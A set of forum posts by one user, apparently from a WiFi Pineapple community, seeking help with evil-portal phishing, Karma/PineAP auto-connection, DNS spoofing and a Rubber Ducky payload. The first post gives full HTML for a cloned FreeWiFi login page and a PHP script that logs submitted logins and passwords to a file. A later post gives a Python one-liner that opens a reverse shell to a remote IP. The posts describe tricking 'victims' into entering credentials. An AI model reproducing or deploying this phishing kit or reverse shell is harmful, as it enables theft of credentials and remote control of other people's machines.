carmelo42

Hello, I'm trying to set up evil portal with credential harvester. so I have duplicated an wifi hotspot identification page, and I use it as my evil portal splash page. But, in this identification page, I have a "ok" button, wich is redirecting on a post.php page : this page writes the txt file with the credential entered ... But as I have not reached the $authtarget page, the client stays unconnected, and even the post.php cannot be reached ... Have you some idea ? Here is my splash page : <!DOCTYPE html"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=400, user-scalable = no"> <title></title> <link rel="stylesheet" type="text/css" href="http://172.16.42.1/freewifi_fichiers/small.css" media="screen"> </head> <body> <div id="header"> <div id="header_c"> <div id="top"> <div id="top-menu"><img src="http://172.16.42.1/freewifi_fichiers/logo2.png" alt="Free" height="112" width="232"></div> </div> </div> <div class="clearer"></div> </div> <div id="bod"> <div id="bod_c"> <div id="block"> <h1>CONNEXION AU SERVICE <span class="red">FreeWiFi</span></h1> <br> <div id="block_2"> <p>Pour vous connecter au service FreeWiFi, <br> utilisez les identifiants que vous avez configurés lors de votre premier accès au service<br> </p><form id="form1" name="form1" method="post" action="post.php"> <label for="login" class="label"> IDENTIFIANT</label> <input name="login" id="login" class="input_r" required> <br> <br> <br> <label for="password" class="label"> MOT DE PASSE</label> <input name="password" id="password" class="input_r" value="" type="password" required> <br> <br> <br> <!-- <a href="#" class="label" style="padding-top:0px;"><img src="/im/help.png" alt="ASSISTANCE" width="37" height="40" border="0" /></a> --> <!-- <input name="priv" id="priv" type="hidden" value="" /> --> <input name="submit" value="Valider" class="input_b" type="submit"> </form> <div class="clearer"></div> </div> <a href="https://wifi.free.fr/?priv=$PRIV_SUB"><img src="http://172.16.42.1/freewifi_fichiers/abo.jpg" alt="Vous n'êtes pas abonné FREE? Cliquez ici et dans une minute, vous pourrez accéder à internet" border="0" height="70" width="399"></a></div> </div> </div> </body></html> Here is mu post.php page : <?php $file = 'harvester_2014-09-22 20:12:59.594540.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=/etc/nodogsplash/htdocs/$authtarget" />

Hi guys, I have tried but I can't make it work :( Can someone explain how to use (briefly) PineAP ? I want the client auto connect to my pineapple, without select it in their wireless preferences (like Karma with previous firmware) A quick "pineAP use guide" like : one the PineAP tile, clic "enable", and after ..." Please I need some help :)

Something goes wrong ... I can't get karma or PineAP running ... So on the MV, we have 3 network interfaces : - LAN - WLAN0 - WLAN1 I connect my "evil" PC to the pineApple through ethernet. I connected via Wifi Manager v2.1 radio0 to my regular SSID, which provides internet to the pineapple I want to use radio1 to "karma" victims ... May be I'm wrong ?

okay thanks shutin :)

ok thanks Ftb, at the moment I can't figure out how to use PineAP ... but I will search ;)

Hmmm in the PineAP tile, there is a 'MK5 Karma' button ... I just enabled it ... I don't understand the PineAP role ...

Hello guys ! Since I'm with 2.0.4 firmware, I can't use Karma anymore ... When I click to enable it, it appears as enabled, but on my wireless client (laptops, smarthpones, ...) I can't see the previous known networks ... Before this firmware, all was working fine ...

ok thank you Sebkinne :) I juste installed evilportal on my MV, and I'm going to play with it :) So, if I understand, I don't need DNSSpoof anymore ?

Hello, I am trying to do this scenario : 1) With KARMA, i want some clients get auto connected to my pineapple 2) With DNSSpoof, I redirect all the client to my fake wifi authentification page, which is on my Kali Laptop. The fake wifi page logs the credentials entered by the 'victim'. 3) The victim is redirected through internet and can navigate as if it was on the real wifi authentification page (the pineapple is connected to internet with WLAN1 as client) Is this even possible ? A little schema attached ;) thanks, Carmelo

yes, but what if I can't flush the cash on the client ? (if the computer is in another room where I can't go)

Hello guys, I'm trying to have fun with DNS Spoof but I have some problems ... In the DNSSpoof conf, I have this : 172.16.42.1 microsoft.com I activate DNSSpoof, navigate on microsoft.com with my browser, the pine apple html page appears. It works. But, if I deactivate DNSSpoof from the PineApple, my browser continues to go into the pine apple page when I want to reach microsoft.com ... Even with DNSSpoof off ! What can I do ? Thanks Carmelo

Here is the file I use : https://www.sendspace.com/file/4figxr

I use frmac.properties file

Same problem here with a french mac keyboard. I have encoded my ducky script with the ressource frmac.properties. Here is what my ducky writes : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.0.37,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(q/bin/sh,-iq);' Here is what I have in my script : python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.37",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Nope, it's WPA2 protected, but as it's mine, I'm in ! What I don't understand : do I have to be connected on the wireless network BEFORE putting the card into monitor mode ? And in wireshark what interface do I have to listen ? wlan0 ? mon0 ?